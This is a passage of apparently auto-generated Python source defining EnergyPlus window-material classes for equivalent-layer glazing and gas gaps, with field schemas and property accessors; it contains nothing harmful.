class WindowMaterialGlazingEquivalentLayer(DataObject):
""" Corresponds to IDD object `WindowMaterial:Glazing:EquivalentLayer`
Glass material properties for Windows or Glass Doors
Transmittance/Reflectance input method.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'optical data type',
{'name': u'Optical Data Type',
'pyname': u'optical_data_type',
'default': u'SpectralAverage',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'alpha'}),
(u'window glass spectral data set name',
{'name': u'Window Glass Spectral Data Set Name',
'pyname': u'window_glass_spectral_data_set_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'front side beam-beam solar transmittance',
{'name': u'Front Side Beam-Beam Solar Transmittance',
'pyname': u'front_side_beambeam_solar_transmittance',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-beam solar transmittance',
{'name': u'Back Side Beam-Beam Solar Transmittance',
'pyname': u'back_side_beambeam_solar_transmittance',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-beam solar reflectance',
{'name': u'Front Side Beam-Beam Solar Reflectance',
'pyname': u'front_side_beambeam_solar_reflectance',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-beam solar reflectance',
{'name': u'Back Side Beam-Beam Solar Reflectance',
'pyname': u'back_side_beambeam_solar_reflectance',
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-beam visible solar transmittance',
{'name': u'Front Side Beam-Beam Visible Solar Transmittance',
'pyname': u'front_side_beambeam_visible_solar_transmittance',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-beam visible solar transmittance',
{'name': u'Back Side Beam-Beam Visible Solar Transmittance',
'pyname': u'back_side_beambeam_visible_solar_transmittance',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-beam visible solar reflectance',
{'name': u'Front Side Beam-Beam Visible Solar Reflectance',
'pyname': u'front_side_beambeam_visible_solar_reflectance',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-beam visible solar reflectance',
{'name': u'Back Side Beam-Beam Visible Solar Reflectance',
'pyname': u'back_side_beambeam_visible_solar_reflectance',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-diffuse solar transmittance',
{'name': u'Front Side Beam-Diffuse Solar Transmittance',
'pyname': u'front_side_beamdiffuse_solar_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-diffuse solar transmittance',
{'name': u'Back Side Beam-Diffuse Solar Transmittance',
'pyname': u'back_side_beamdiffuse_solar_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-diffuse solar reflectance',
{'name': u'Front Side Beam-Diffuse Solar Reflectance',
'pyname': u'front_side_beamdiffuse_solar_reflectance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-diffuse solar reflectance',
{'name': u'Back Side Beam-Diffuse Solar Reflectance',
'pyname': u'back_side_beamdiffuse_solar_reflectance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-diffuse visible solar transmittance',
{'name': u'Front Side Beam-Diffuse Visible Solar Transmittance',
'pyname': u'front_side_beamdiffuse_visible_solar_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-diffuse visible solar transmittance',
{'name': u'Back Side Beam-Diffuse Visible Solar Transmittance',
'pyname': u'back_side_beamdiffuse_visible_solar_transmittance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side beam-diffuse visible solar reflectance',
{'name': u'Front Side Beam-Diffuse Visible Solar Reflectance',
'pyname': u'front_side_beamdiffuse_visible_solar_reflectance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side beam-diffuse visible solar reflectance',
{'name': u'Back Side Beam-Diffuse Visible Solar Reflectance',
'pyname': u'back_side_beamdiffuse_visible_solar_reflectance',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'diffuse-diffuse solar transmittance',
{'name': u'Diffuse-Diffuse Solar Transmittance',
'pyname': u'diffusediffuse_solar_transmittance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side diffuse-diffuse solar reflectance',
{'name': u'Front Side Diffuse-Diffuse Solar Reflectance',
'pyname': u'front_side_diffusediffuse_solar_reflectance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side diffuse-diffuse solar reflectance',
{'name': u'Back Side Diffuse-Diffuse Solar Reflectance',
'pyname': u'back_side_diffusediffuse_solar_reflectance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'diffuse-diffuse visible solar transmittance',
{'name': u'Diffuse-Diffuse Visible Solar Transmittance',
'pyname': u'diffusediffuse_visible_solar_transmittance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side diffuse-diffuse visible solar reflectance',
{'name': u'Front Side Diffuse-Diffuse Visible Solar Reflectance',
'pyname': u'front_side_diffusediffuse_visible_solar_reflectance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'back side diffuse-diffuse visible solar reflectance',
{'name': u'Back Side Diffuse-Diffuse Visible Solar Reflectance',
'pyname': u'back_side_diffusediffuse_visible_solar_reflectance',
'default': 'autocalculate',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': True,
'type': u'real',
'unit': u'dimensionless'}),
(u'infrared transmittance (applies to front and back)',
{'name': u'Infrared Transmittance (applies to front and back)',
'pyname': u'infrared_transmittance_applies_to_front_and_back',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'front side infrared emissivity',
{'name': u'Front Side Infrared Emissivity',
'pyname': u'front_side_infrared_emissivity',
'default': 0.84,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'}),
(u'back side infrared emissivity',
{'name': u'Back Side Infrared Emissivity',
'pyname': u'back_side_infrared_emissivity',
'default': 0.84,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0,
'unit': u'dimensionless'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 11,
'name': u'WindowMaterial:Glazing:EquivalentLayer',
'pyname': u'WindowMaterialGlazingEquivalentLayer',
'required-object': False,
'unique-object': False}
@property
def name(self):
    """Get or set IDD field `Name`.

    Returns:
        str: the stored name, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Name"]

@name.setter
def name(self, value=None):
    """Assign IDD field `Name`."""
    self["Name"] = value
@property
def optical_data_type(self):
    """Get or set IDD field `Optical Data Type`.

    Spectral is no longer supported; SpectralAverage is now the default.
    Default: "SpectralAverage".

    Returns:
        str: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Optical Data Type"]

@optical_data_type.setter
def optical_data_type(self, value="SpectralAverage"):
    """Assign IDD field `Optical Data Type` (default "SpectralAverage")."""
    self["Optical Data Type"] = value
@property
def window_glass_spectral_data_set_name(self):
    """Get or set IDD field `Window Glass Spectral Data Set Name`.

    Used only when Optical Data Type = Spectral.

    Returns:
        str: the stored name, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Window Glass Spectral Data Set Name"]

@window_glass_spectral_data_set_name.setter
def window_glass_spectral_data_set_name(self, value=None):
    """Assign IDD field `Window Glass Spectral Data Set Name`."""
    self["Window Glass Spectral Data Set Name"] = value
@property
def front_side_beambeam_solar_transmittance(self):
    """Get or set IDD field `Front Side Beam-Beam Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage.
    Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Beam-Beam Solar Transmittance"]

@front_side_beambeam_solar_transmittance.setter
def front_side_beambeam_solar_transmittance(self, value=None):
    """Assign IDD field `Front Side Beam-Beam Solar Transmittance`."""
    self["Front Side Beam-Beam Solar Transmittance"] = value
@property
def back_side_beambeam_solar_transmittance(self):
    """Get or set IDD field `Back Side Beam-Beam Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage.
    Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Beam-Beam Solar Transmittance"]

@back_side_beambeam_solar_transmittance.setter
def back_side_beambeam_solar_transmittance(self, value=None):
    """Assign IDD field `Back Side Beam-Beam Solar Transmittance`."""
    self["Back Side Beam-Beam Solar Transmittance"] = value
@property
def front_side_beambeam_solar_reflectance(self):
    """Get or set IDD field `Front Side Beam-Beam Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. Front side is the
    side closest to outdoor air. Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Beam-Beam Solar Reflectance"]

@front_side_beambeam_solar_reflectance.setter
def front_side_beambeam_solar_reflectance(self, value=None):
    """Assign IDD field `Front Side Beam-Beam Solar Reflectance`."""
    self["Front Side Beam-Beam Solar Reflectance"] = value
@property
def back_side_beambeam_solar_reflectance(self):
    """Get or set IDD field `Back Side Beam-Beam Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. Back side is the
    side closest to zone air. Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Beam-Beam Solar Reflectance"]

@back_side_beambeam_solar_reflectance.setter
def back_side_beambeam_solar_reflectance(self, value=None):
    """Assign IDD field `Back Side Beam-Beam Solar Reflectance`."""
    self["Back Side Beam-Beam Solar Reflectance"] = value
@property
def front_side_beambeam_visible_solar_transmittance(self):
    """Get or set IDD field `Front Side Beam-Beam Visible Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage.
    Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Beam-Beam Visible Solar Transmittance"]

@front_side_beambeam_visible_solar_transmittance.setter
def front_side_beambeam_visible_solar_transmittance(self, value=None):
    """Assign IDD field `Front Side Beam-Beam Visible Solar Transmittance`."""
    self["Front Side Beam-Beam Visible Solar Transmittance"] = value
@property
def back_side_beambeam_visible_solar_transmittance(self):
    """Get or set IDD field `Back Side Beam-Beam Visible Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage.
    Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Beam-Beam Visible Solar Transmittance"]

@back_side_beambeam_visible_solar_transmittance.setter
def back_side_beambeam_visible_solar_transmittance(self, value=None):
    """Assign IDD field `Back Side Beam-Beam Visible Solar Transmittance`."""
    self["Back Side Beam-Beam Visible Solar Transmittance"] = value
@property
def front_side_beambeam_visible_solar_reflectance(self):
    """Get or set IDD field `Front Side Beam-Beam Visible Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. Front side is the
    side closest to outdoor air. Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Beam-Beam Visible Solar Reflectance"]

@front_side_beambeam_visible_solar_reflectance.setter
def front_side_beambeam_visible_solar_reflectance(self, value=None):
    """Assign IDD field `Front Side Beam-Beam Visible Solar Reflectance`."""
    self["Front Side Beam-Beam Visible Solar Reflectance"] = value
@property
def back_side_beambeam_visible_solar_reflectance(self):
    """Get or set IDD field `Back Side Beam-Beam Visible Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. Back side is the
    side closest to zone air. Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Beam-Beam Visible Solar Reflectance"]

@back_side_beambeam_visible_solar_reflectance.setter
def back_side_beambeam_visible_solar_reflectance(self, value=None):
    """Assign IDD field `Back Side Beam-Beam Visible Solar Reflectance`."""
    self["Back Side Beam-Beam Visible Solar Reflectance"] = value
@property
def front_side_beamdiffuse_solar_transmittance(self):
    """Get or set IDD field `Front Side Beam-Diffuse Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage.
    Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Beam-Diffuse Solar Transmittance"]

@front_side_beamdiffuse_solar_transmittance.setter
def front_side_beamdiffuse_solar_transmittance(self, value=None):
    """Assign IDD field `Front Side Beam-Diffuse Solar Transmittance`."""
    self["Front Side Beam-Diffuse Solar Transmittance"] = value
@property
def back_side_beamdiffuse_solar_transmittance(self):
    """Get or set IDD field `Back Side Beam-Diffuse Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage.
    Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Beam-Diffuse Solar Transmittance"]

@back_side_beamdiffuse_solar_transmittance.setter
def back_side_beamdiffuse_solar_transmittance(self, value=None):
    """Assign IDD field `Back Side Beam-Diffuse Solar Transmittance`."""
    self["Back Side Beam-Diffuse Solar Transmittance"] = value
@property
def front_side_beamdiffuse_solar_reflectance(self):
    """Get or set IDD field `Front Side Beam-Diffuse Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. Front side is the
    side closest to outdoor air. Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Beam-Diffuse Solar Reflectance"]

@front_side_beamdiffuse_solar_reflectance.setter
def front_side_beamdiffuse_solar_reflectance(self, value=None):
    """Assign IDD field `Front Side Beam-Diffuse Solar Reflectance`."""
    self["Front Side Beam-Diffuse Solar Reflectance"] = value
@property
def back_side_beamdiffuse_solar_reflectance(self):
    """Get or set IDD field `Back Side Beam-Diffuse Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. Back side is the
    side closest to zone air. Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Beam-Diffuse Solar Reflectance"]

@back_side_beamdiffuse_solar_reflectance.setter
def back_side_beamdiffuse_solar_reflectance(self, value=None):
    """Assign IDD field `Back Side Beam-Diffuse Solar Reflectance`."""
    self["Back Side Beam-Diffuse Solar Reflectance"] = value
@property
def front_side_beamdiffuse_visible_solar_transmittance(self):
    """Get or set IDD field `Front Side Beam-Diffuse Visible Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage.
    Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Beam-Diffuse Visible Solar Transmittance"]

@front_side_beamdiffuse_visible_solar_transmittance.setter
def front_side_beamdiffuse_visible_solar_transmittance(self, value=None):
    """Assign IDD field `Front Side Beam-Diffuse Visible Solar Transmittance`."""
    self["Front Side Beam-Diffuse Visible Solar Transmittance"] = value
@property
def back_side_beamdiffuse_visible_solar_transmittance(self):
    """Get or set IDD field `Back Side Beam-Diffuse Visible Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage.
    Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Beam-Diffuse Visible Solar Transmittance"]

@back_side_beamdiffuse_visible_solar_transmittance.setter
def back_side_beamdiffuse_visible_solar_transmittance(self, value=None):
    """Assign IDD field `Back Side Beam-Diffuse Visible Solar Transmittance`."""
    self["Back Side Beam-Diffuse Visible Solar Transmittance"] = value
@property
def front_side_beamdiffuse_visible_solar_reflectance(self):
    """Get or set IDD field `Front Side Beam-Diffuse Visible Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. Front side is the
    side closest to outdoor air. Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Beam-Diffuse Visible Solar Reflectance"]

@front_side_beamdiffuse_visible_solar_reflectance.setter
def front_side_beamdiffuse_visible_solar_reflectance(self, value=None):
    """Assign IDD field `Front Side Beam-Diffuse Visible Solar Reflectance`."""
    self["Front Side Beam-Diffuse Visible Solar Reflectance"] = value
@property
def back_side_beamdiffuse_visible_solar_reflectance(self):
    """Get or set IDD field `Back Side Beam-Diffuse Visible Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. Back side is the
    side closest to zone air. Dimensionless; value <= 1.0.

    Returns:
        float: the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Beam-Diffuse Visible Solar Reflectance"]

@back_side_beamdiffuse_visible_solar_reflectance.setter
def back_side_beamdiffuse_visible_solar_reflectance(self, value=None):
    """Assign IDD field `Back Side Beam-Diffuse Visible Solar Reflectance`."""
    self["Back Side Beam-Diffuse Visible Solar Reflectance"] = value
@property
def diffusediffuse_solar_transmittance(self):
    """Get or set IDD field `Diffuse-Diffuse Solar Transmittance`.

    Used only when Optical Data Type = SpectralAverage. If set to
    "autocalculate" (the default), the diffuse-diffuse solar transmittance
    is estimated automatically from other inputs; a zero-or-positive
    number entered here is used directly. Dimensionless; value <= 1.0.

    Returns:
        float or "Autocalculate": the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Diffuse-Diffuse Solar Transmittance"]

@diffusediffuse_solar_transmittance.setter
def diffusediffuse_solar_transmittance(self, value="autocalculate"):
    """Assign IDD field `Diffuse-Diffuse Solar Transmittance`."""
    self["Diffuse-Diffuse Solar Transmittance"] = value
@property
def front_side_diffusediffuse_solar_reflectance(self):
    """Get or set IDD field `Front Side Diffuse-Diffuse Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. If set to
    "autocalculate" (the default), the front diffuse-diffuse solar
    reflectance is estimated automatically from other inputs; a
    zero-or-positive number entered here is used directly. Front side is
    the side closest to outdoor air. Dimensionless; value <= 1.0.

    Returns:
        float or "Autocalculate": the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Front Side Diffuse-Diffuse Solar Reflectance"]

@front_side_diffusediffuse_solar_reflectance.setter
def front_side_diffusediffuse_solar_reflectance(self, value="autocalculate"):
    """Assign IDD field `Front Side Diffuse-Diffuse Solar Reflectance`."""
    self["Front Side Diffuse-Diffuse Solar Reflectance"] = value
@property
def back_side_diffusediffuse_solar_reflectance(self):
    """Get or set IDD field `Back Side Diffuse-Diffuse Solar Reflectance`.

    Used only when Optical Data Type = SpectralAverage. If set to
    "autocalculate" (the default), the back diffuse-diffuse solar
    reflectance is estimated automatically from other inputs; a
    zero-or-positive number entered here is used directly. Back side is
    the side closest to indoor air. Dimensionless; value <= 1.0.

    Returns:
        float or "Autocalculate": the stored value, or None if not set.

    Raises:
        ValueError: if an invalid value is assigned.
    """
    return self["Back Side Diffuse-Diffuse Solar Reflectance"]

@back_side_diffusediffuse_solar_reflectance.setter
def back_side_diffusediffuse_solar_reflectance(self, value="autocalculate"):
    """Assign IDD field `Back Side Diffuse-Diffuse Solar Reflectance`."""
    self["Back Side Diffuse-Diffuse Solar Reflectance"] = value
@property
def diffusediffuse_visible_solar_transmittance(self):
"""field `Diffuse-Diffuse Visible Solar Transmittance`
| Used only when Optical Data Type = SpectralAverage
| This input field is not used currently.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Diffuse-Diffuse Visible Solar Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `diffusediffuse_visible_solar_transmittance` or None if not set
"""
return self["Diffuse-Diffuse Visible Solar Transmittance"]
@diffusediffuse_visible_solar_transmittance.setter
def diffusediffuse_visible_solar_transmittance(
self,
value="autocalculate"):
""" Corresponds to IDD field `Diffuse-Diffuse Visible Solar Transmittance`
"""
self["Diffuse-Diffuse Visible Solar Transmittance"] = value
@property
def front_side_diffusediffuse_visible_solar_reflectance(self):
"""field `Front Side Diffuse-Diffuse Visible Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| This input field is not used currently.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Front Side Diffuse-Diffuse Visible Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `front_side_diffusediffuse_visible_solar_reflectance` or None if not set
"""
return self["Front Side Diffuse-Diffuse Visible Solar Reflectance"]
@front_side_diffusediffuse_visible_solar_reflectance.setter
def front_side_diffusediffuse_visible_solar_reflectance(
self,
value="autocalculate"):
""" Corresponds to IDD field `Front Side Diffuse-Diffuse Visible Solar Reflectance`
"""
self["Front Side Diffuse-Diffuse Visible Solar Reflectance"] = value
@property
def back_side_diffusediffuse_visible_solar_reflectance(self):
"""field `Back Side Diffuse-Diffuse Visible Solar Reflectance`
| Used only when Optical Data Type = SpectralAverage
| This input field is not used currently.
| Units: dimensionless
| Default value: "autocalculate"
| value <= 1.0
Args:
value (float or "Autocalculate"): value for IDD Field `Back Side Diffuse-Diffuse Visible Solar Reflectance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float or "Autocalculate": the value of `back_side_diffusediffuse_visible_solar_reflectance` or None if not set
"""
return self["Back Side Diffuse-Diffuse Visible Solar Reflectance"]
@back_side_diffusediffuse_visible_solar_reflectance.setter
def back_side_diffusediffuse_visible_solar_reflectance(
self,
value="autocalculate"):
""" Corresponds to IDD field `Back Side Diffuse-Diffuse Visible Solar Reflectance`
"""
self["Back Side Diffuse-Diffuse Visible Solar Reflectance"] = value
@property
def infrared_transmittance_applies_to_front_and_back(self):
"""field `Infrared Transmittance (applies to front and back)`
| The long-wave hemispherical transmittance of the glazing.
| Assumed to be the same for both sides of the glazing.
| Units: dimensionless
| value <= 1.0
Args:
value (float): value for IDD Field `Infrared Transmittance (applies to front and back)`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_transmittance_applies_to_front_and_back` or None if not set
"""
return self["Infrared Transmittance (applies to front and back)"]
@infrared_transmittance_applies_to_front_and_back.setter
def infrared_transmittance_applies_to_front_and_back(self, value=None):
"""Corresponds to IDD field `Infrared Transmittance (applies to front
and back)`"""
self["Infrared Transmittance (applies to front and back)"] = value
@property
def front_side_infrared_emissivity(self):
"""field `Front Side Infrared Emissivity`
| The front side long-wave hemispherical emissivity of the glazing.
| Units: dimensionless
| Default value: 0.84
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_infrared_emissivity` or None if not set
"""
return self["Front Side Infrared Emissivity"]
@front_side_infrared_emissivity.setter
def front_side_infrared_emissivity(self, value=0.84):
"""Corresponds to IDD field `Front Side Infrared Emissivity`"""
self["Front Side Infrared Emissivity"] = value
@property
def back_side_infrared_emissivity(self):
"""field `Back Side Infrared Emissivity`
| The back side long-wave hemispherical emissivity of the glazing.
| Units: dimensionless
| Default value: 0.84
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Infrared Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_infrared_emissivity` or None if not set
"""
return self["Back Side Infrared Emissivity"]
@back_side_infrared_emissivity.setter
def back_side_infrared_emissivity(self, value=0.84):
"""Corresponds to IDD field `Back Side Infrared Emissivity`"""
self["Back Side Infrared Emissivity"] = value
class WindowMaterialGapEquivalentLayer(DataObject):

    """ Corresponds to IDD object `WindowMaterial:Gap:EquivalentLayer`
        Gas material properties that are used in Windows Equivalent Layer
        References only WindowMaterial:Gas properties
    """
    # IDD metadata consumed by the DataObject base class for field lookup,
    # validation and serialization. NOTE(review): OrderedDict ordering mirrors
    # the IDD field order and is significant — do not reorder entries.
    # Coefficient fields (conductivity/viscosity/specific heat A, B, C) are
    # only meaningful when Gas Type = Custom, per the property docstrings below.
    _schema = {'extensible-fields': OrderedDict(),
               'fields': OrderedDict([(u'name',
                                       {'name': u'Name',
                                        'pyname': u'name',
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'alpha'}),
                                      (u'gas type',
                                       {'name': u'Gas Type',
                                        'pyname': u'gas_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'AIR',
                                                            u'ARGON',
                                                            u'KRYPTON',
                                                            u'XENON',
                                                            u'CUSTOM'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'thickness',
                                       {'name': u'Thickness',
                                        'pyname': u'thickness',
                                        'minimum>': 0.0,
                                        'required-field': True,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'm'}),
                                      (u'gap vent type',
                                       {'name': u'Gap Vent Type',
                                        'pyname': u'gap_vent_type',
                                        'required-field': True,
                                        'autosizable': False,
                                        'accepted-values': [u'Sealed',
                                                            u'VentedIndoor',
                                                            u'VentedOutdoor'],
                                        'autocalculatable': False,
                                        'type': 'alpha'}),
                                      (u'conductivity coefficient a',
                                       {'name': u'Conductivity Coefficient A',
                                        'pyname': u'conductivity_coefficient_a',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m-K'}),
                                      (u'conductivity coefficient b',
                                       {'name': u'Conductivity Coefficient B',
                                        'pyname': u'conductivity_coefficient_b',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m-K2'}),
                                      (u'conductivity coefficient c',
                                       {'name': u'Conductivity Coefficient C',
                                        'pyname': u'conductivity_coefficient_c',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'W/m-K3'}),
                                      (u'viscosity coefficient a',
                                       {'name': u'Viscosity Coefficient A',
                                        'pyname': u'viscosity_coefficient_a',
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kg/m-s'}),
                                      (u'viscosity coefficient b',
                                       {'name': u'Viscosity Coefficient B',
                                        'pyname': u'viscosity_coefficient_b',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kg/m-s-K'}),
                                      (u'viscosity coefficient c',
                                       {'name': u'Viscosity Coefficient C',
                                        'pyname': u'viscosity_coefficient_c',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'kg/m-s-K2'}),
                                      (u'specific heat coefficient a',
                                       {'name': u'Specific Heat Coefficient A',
                                        'pyname': u'specific_heat_coefficient_a',
                                        'minimum>': 0.0,
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'J/kg-K'}),
                                      (u'specific heat coefficient b',
                                       {'name': u'Specific Heat Coefficient B',
                                        'pyname': u'specific_heat_coefficient_b',
                                        'required-field': False,
                                        'autosizable': False,
                                        'autocalculatable': False,
                                        'type': u'real',
                                        'unit': u'J/kg-K2'}),
                                      (u'specific heat coefficient c',
